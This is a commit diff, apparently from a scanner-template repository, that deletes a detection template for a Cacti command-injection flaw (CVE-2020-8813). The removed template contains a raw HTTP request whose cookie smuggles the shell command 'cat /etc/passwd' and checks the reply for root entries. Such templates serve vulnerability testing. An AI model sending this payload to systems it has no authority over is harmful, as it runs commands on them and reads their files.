added cve-2019-15107

cves/CVE-2020-8813.yaml

@@ -1,32 +0,0 @@
-id: cve-2020-8813
-
-info:
-  name: CVE-2020-8813
-  author: bp0lr
-  severity: high
-  description: graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
-
-  # Reference to exploit
-  # https://www.exploit-db.com/exploits/48159
-
-requests:
-  - raw:
-      - |
-        GET /graph_realtime.php?action=init HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        Accept-Encoding: gzip, deflate
-        Cookie: cacti=;cat${IFS}/etc/passwd;
-
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: regex
-        regex:
-          - "root:[x*]:0:0:"
-        part: body